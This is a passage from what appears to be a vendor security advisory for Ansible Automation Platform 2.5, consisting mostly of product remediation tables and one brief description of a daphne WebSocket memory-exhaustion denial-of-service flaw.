| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in daphne. An unauthenticated remote attacker could exploit this vulnerability by sending arbitrarily large WebSocket messages or frames. This oversight in payload size handling can lead to excessive memory consumption, resulting in a denial of service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — | ||
